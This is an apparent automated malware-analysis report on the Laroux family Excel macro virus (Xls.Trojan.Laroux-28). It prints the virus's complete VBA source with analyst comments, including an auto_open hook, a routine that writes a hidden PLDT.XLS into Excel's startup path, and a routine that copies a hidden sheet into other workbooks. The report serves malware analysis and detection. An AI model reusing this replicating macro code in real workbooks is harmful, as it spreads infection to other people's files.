Xls.Trojan.Laroux-28 — Office (OLE) malware analysis

Static analysis result for SHA-256 b684ca4b2ed17dbe…

MALICIOUS

Office (OLE)

231.5 KB Created: 1999-12-16 05:06:57 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 80de160d59326399b21481b0e88fe660 SHA-1: bb96513b7c94dd238a9b4b608705a7d588cdb597 SHA-256: b684ca4b2ed17dbe6c472a29a8e3b8c2828075b0a24f20aba6e7d639908086d2
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-28 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

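The file is identified as a malicious Excel 5 macro virus (Laroux-CV) by multiple critical heuristics. The auto_open macro registers the check_files subroutine as the OnSheetActivate handler; when that handler fires, check_files attempts to save a copy of the macro sheet as 'PLDT.XLS' in the application's startup path, indicating an attempt to establish persistence, and, once that file exists, copies the hidden 'pldt' sheet into active workbooks that contain no modules. The macro also manipulates sheet visibility and workbook properties, common behaviors for this type of malware. The persistence location is Excel's own startup path (Application.StartupPath) rather than a Windows Run key or Startup folder, so the T1547.001 mapping above is approximate; ATT&CK's Office Application Startup (T1137) describes it more closely.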

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-28
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10204 bytes
SHA-256: 926cadb6aae7f7ed5a8fb38f26fa0fbe0f6776c0e8951592800c8297a2eab986
Detection
ClamAV: Xls.Trojan.Laroux-28
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pldt"


Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Analyst note: auto-run entry point. Excel runs a macro named auto_open when
' the workbook is opened, so this executes without further user action once
' macros are allowed to run.
    
    ' Hooks the application-wide sheet-activation event: from here on, every
    ' sheet activation runs check_files (defined below in this module).
    ' This assignment is the only live statement in the procedure.
    Application.OnSheetActivate = "check_files"

' Commented-out code below is inert. It references a workbook named
' "4300 Rack" and manual calculation mode; presumably a leftover from the
' host workbook's own macros -- not confirmed by anything else in this listing.
'    wbook$ = ActiveWorkbook.Name
'    If wbook$ = "4300 Rack" Then
'        Workbooks(wbook$).Calculation = xlManual
'    Else
'    End If


End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
' Analyst note: replication/persistence routine, installed as the
' OnSheetActivate handler by auto_open. It derives a two-flag state and acts on it:
'   p = 1 when PLDT.XLS already exists in Excel's startup path
'   w = 1 when the active workbook contains at least one module sheet
'   whichfile = p + w * 10  ->  10: drop PLDT.XLS into the startup path
'                                1: copy the "pldt" sheet into the active workbook
'                            0, 11: no action (Case Else is empty)
' Host indicators visible in this code: a file named PLDT.XLS in Excel's
' startup path, and a hidden sheet named "pldt" placed first in a workbook.
    c$ = Application.StartupPath
    ' Dir returns the bare file name when the file exists, otherwise "".
    m$ = Dir(c$ & "\" & "PLDT.XLS")
    If m$ = "PLDT.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    ' Active workbook has modules and PLDT.XLS is absent from the startup path:
    ' write the "pldt" sheet out as a new workbook there.
    ' Screen updating is switched off so the following steps are not drawn.
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("pldt").Visible = True
    Sheets("pldt").Select
    ' Copy with no destination puts the sheet in a new workbook, which becomes
    ' the active workbook (hence the ActiveWorkbook references that follow).
    Sheets("pldt").Copy
    ' Blank the summary properties of the new workbook.
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    ' Remember the current directory so it can be restored after the save.
    c4$ = CurDir()
    ChDir Application.StartupPath
    ' Hide the new workbook's window before saving it.
    ActiveWindow.Visible = False
    ' Persistence step: save as PLDT.XLS in the startup path, no passwords, no backup.
    ' NOTE(review): this path is joined with "/" while the existence check above uses "\".
    Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "PLDT.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    ' Re-hide the "pldt" sheet in the workbook the routine started from.
    Workbooks(n4$).Sheets("pldt").Visible = False
    ' Clear the handler, then point it at the copy of check_files inside PLDT.XLS.
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "PLDT.XLS!check_files"
    Case 1
    ' PLDT.XLS exists in the startup path and the active workbook has no
    ' modules: insert the "pldt" sheet into the active workbook.
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    ' p4$ is assigned here but not read anywhere in this listing.
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    ' Skip the copy when the first sheet is already named "pldt".
    If s$ <> "pldt" Then
        ' Copy the sheet from PLDT.XLS in front of the first sheet, then hide it.
        Workbooks("PLDT.XLS").Sheets("pldt").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("pldt").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "PLDT.XLS!check_files"
    Case Else
End Select
End Sub

Function Chkdgt(ByVal acctnbr As String) As Variant
' Returns acctnbr reformatted as "AAA-BBBBB-C-D": its first three characters,
' the five characters starting at position 4, its last character, and a
' computed check digit D.
'
' D is derived from the first nine characters: characters at odd positions
' are doubled and written as two digits, characters at even positions are
' kept as they are, the decimal digits of the resulting string are summed,
' the sum is subtracted from 100, and the last digit of that value is used.
'
' Analyst note: nothing in this function touches files, sheets or
' application settings; it does string and digit arithmetic only.

Dim leadDigits As String
Dim pos As Integer
Dim digitRun As String
Dim idx As Integer
Dim digitSum As Integer
Dim oneChar As String

leadDigits = Left$(acctnbr, 9)

' Build the digit string: doubled (two-digit) values for odd positions,
' the raw character for even positions.
For pos = 1 To 9
    oneChar = Mid$(leadDigits, pos, 1)
    If pos Mod 2 = 1 Then
        digitRun = digitRun & Format$(Val(oneChar) * 2, "00")
    Else
        digitRun = digitRun & oneChar
    End If
Next pos

' Add up every decimal digit of the string built above.
idx = 1
Do While idx <= Len(digitRun)
    digitSum = digitSum + Val(Mid$(digitRun, idx, 1))
    idx = idx + 1
Loop

digitSum = 100 - digitSum

Chkdgt = Left(acctnbr, 3) & "-" & Mid(acctnbr, 4, 5) & "-" & Right(acctnbr, 1) & "-" & Right$(digitSum, 1)

End Function



' Processing file: /opt/analyzer/scan_staging/7cc073ea9bea47c7bd2aa2b0fa0f30a2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/pldt - 5177 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub auto_open())
' Line #3:
' Line #4:
' 	LitStr 0x000B "check_files"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #5:
' Line #6:
' 	QuoteRem 0x0000 0x0020 "    wbook$ = ActiveWorkbook.Name"
' Line #7:
' 	QuoteRem 0x0000 0x0020 "    If wbook$ = "4300 Rack" Then"
' Line #8:
' 	QuoteRem 0x0000 0x0030 "        Workbooks(wbook$).Calculation = xlManual"
' Line #9:
' 	QuoteRem 0x0000 0x0008 "    Else"
' Line #10:
' 	QuoteRem 0x0000 0x000A "    End If"
' Line #11:
' Line #12:
' Line #13:
' 	EndSub 
' Line #14:
' Line #15:
' 	FuncDefn (Sub check_files())
' Line #16:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St c$ 
' Line #17:
' 	Ld c$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x0008 "PLDT.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St m$ 
' Line #18:
' 	Ld m$ 
' 	LitStr 0x0008 "PLDT.XLS"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St p 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St p 
' 	EndIf 
' Line #19:
' 	Ld ActiveWor
... (truncated)